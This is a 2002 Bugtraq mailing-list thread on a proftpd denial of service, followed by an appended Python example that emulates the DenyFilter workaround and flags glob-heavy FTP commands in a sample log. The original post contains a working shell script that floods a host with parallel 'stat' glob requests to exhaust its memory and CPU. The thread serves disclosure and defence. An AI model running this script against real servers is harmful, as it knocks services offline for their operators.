Bugtraq mailing list archives
Re: [VulnWatch] proftpd <=1.2.7rc3 DoS
From: Rob klein Gunnewiek <rmkleing () hio hen nl>
Date: Wed, 11 Dec 2002 01:15:01 +0100 (MET)
Hello,

1. I know that the workaround with the DenyFilter works.

2. Proftpd by default doesn't have this filter set, neither has the default proftpd install on slackware 8.1.

3. The methods mentioned on the page you refer to do not work on later proftpd versions (tested on 1.2.7rc3) because of limits set in the code, i.e.:

    ftp> ls .*./*?/.*./*?/.*./*?/.*./*?/.*./
    200 PORT command successful
    150 Opening ASCII mode data connection for file list
    226-Out of memory during globbing of .*./*?/.*./*?/.*./*?/.*./*?/.*./
    226 Transfer complete.
    ftp>

These proftpd versions don't even process that command.

I think I have done proper research on this issue before notifying anyone. People should do more research before making any conclusions, it's far less embarrassing.

Rob.

On Tue, 10 Dec 2002, Kurt Seifried wrote:
This is so old I can't even find any postings/articles I remember making on it. Here is one link from early last year:

http://lwn.net/2001/0322/a/proftpd-dos.php3

Check the documentation:

    DenyFilter \*.*/

Problem solved. People should search Google before posting, it's far less embarrassing.

Kurt Seifried, kurt () seifried org
A15B BEE5 B391 B9AD B0EF AEB0 AD63 0B4E AD56 E574
http://seifried.org/security/

----- Original Message -----
From: "Rob klein Gunnewiek" <rmkleing () hio hen nl>
To: <bugtraq () securityfocus com>; <vulnwatch () vulnwatch org>
Sent: Sunday, December 08, 2002 4:53 AM
Subject: [VulnWatch] proftpd <=1.2.7rc3 DoS

Hello,

proftpd is vulnerable to denial of service similar to the list */../*/../*/../*.

    #!/bin/sh
    #
    # proftpd <=1.2.7rc3 DoS - Requires anonymous/ftp login at least
    # might work against many other FTP daemons
    # consumes nearly all memory and a lot of CPU
    #
    # tested against slackware 8.1 - proftpd 1.2.4 and 1.2.7rc3
    #
    # 7-dec-02 - detach - www.duho.org
    #
    # use: ./prodos.sh <host> <user> <pass>

    # do this some more to make sure the system eventually dies
    cnt=25
    while [ $cnt -gt 0 ] ; do
    ftp -n << EOF&
    o $1
    quote user $2
    quote pass $3
    quote stat /*/*/*/*/*/*/*
    quit
    EOF
    let cnt=cnt-1
    done
    sleep 2
    killall -9 ftp
    echo DONE!
    #end
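The DenyFilter workaround Kurt points to, and the two globbing request shapes that appear in this thread (the `stat /*/*/*/*/*/*/*` from the script and the `ls .*./*?/...` from Rob's test), as an added example that is not part of the original posts or of proftpd's own code. proftpd applies DenyFilter as a POSIX extended regex to the argument of each command and rejects the command on a match; this block emulates that check with Python's `re` (an assumption that the two regex dialects agree for this simple pattern), and then runs it, together with a wildcard-segment count, over a constructed command log so a defender can see which requests the filter would have stopped and which would still need watching. The log format, the command list and the segment threshold are assumptions for the illustration.

```python
import re

# The DenyFilter pattern from Kurt's message: a literal '*' followed by
# anything and then a '/'. proftpd treats DenyFilter as a POSIX extended
# regex; Python's re is assumed equivalent for this pattern (added example,
# not proftpd code).
DENY_FILTER = re.compile(r"\*.*/")

# Commands whose argument proftpd expands with glob(); assumption for the
# illustration, matching the commands used in the thread plus NLST.
GLOB_COMMANDS = {"LIST", "NLST", "STAT"}


def denied(arg: str) -> bool:
    """True if DenyFilter \\*.*/ would reject this command argument."""
    return DENY_FILTER.search(arg) is not None


def wildcard_segments(arg: str) -> int:
    """Count path segments that carry a glob metacharacter.

    Glob cost grows with the number of wildcard segments, so a high count is
    the shape of the requests described in the thread even when a site has
    no DenyFilter configured.
    """
    return sum(1 for seg in arg.split("/") if any(c in seg for c in "*?["))


def parse_log(log: str):
    """Yield (COMMAND, argument) pairs from a 'CMD arg' per-line log."""
    for line in log.splitlines():
        line = line.strip()
        if not line:
            continue
        cmd, _, arg = line.partition(" ")
        yield cmd.upper(), arg


def triage(log: str, segment_threshold: int = 3):
    """One record per globbing command in the log.

    'denied_by_filter' is what DenyFilter would do; 'flag' also catches
    arguments with many wildcard segments, for hosts without the filter.
    The threshold of 3 is an assumption, not a proftpd setting.
    """
    records = []
    for cmd, arg in parse_log(log):
        if cmd not in GLOB_COMMANDS:
            continue
        segs = wildcard_segments(arg)
        hit = denied(arg)
        records.append({
            "command": cmd,
            "argument": arg,
            "denied_by_filter": hit,
            "wildcard_segments": segs,
            "flag": hit or segs >= segment_threshold,
        })
    return records


# Constructed sample log: an anonymous session that mixes ordinary listings
# with the two globbing requests quoted in the thread.
SAMPLE_LOG = """\
USER anonymous
PASS ftp@example.invalid
LIST pub/
STAT /*/*/*/*/*/*/*
LIST .*./*?/.*./*?/.*./*?/.*./*?/.*./
RETR pub/README
NLST *.txt
"""

if __name__ == "__main__":
    for rec in triage(SAMPLE_LOG):
        print(rec)
```

Two things worth noticing in the output: `NLST *.txt` is not matched by `\*.*/` because no `/` follows the `*`, so the filter is targeted at multi-segment globs rather than all wildcards; and the filter only helps where it is actually set, which is Rob's second point, so the segment count is the check to keep for a server whose config you do not control.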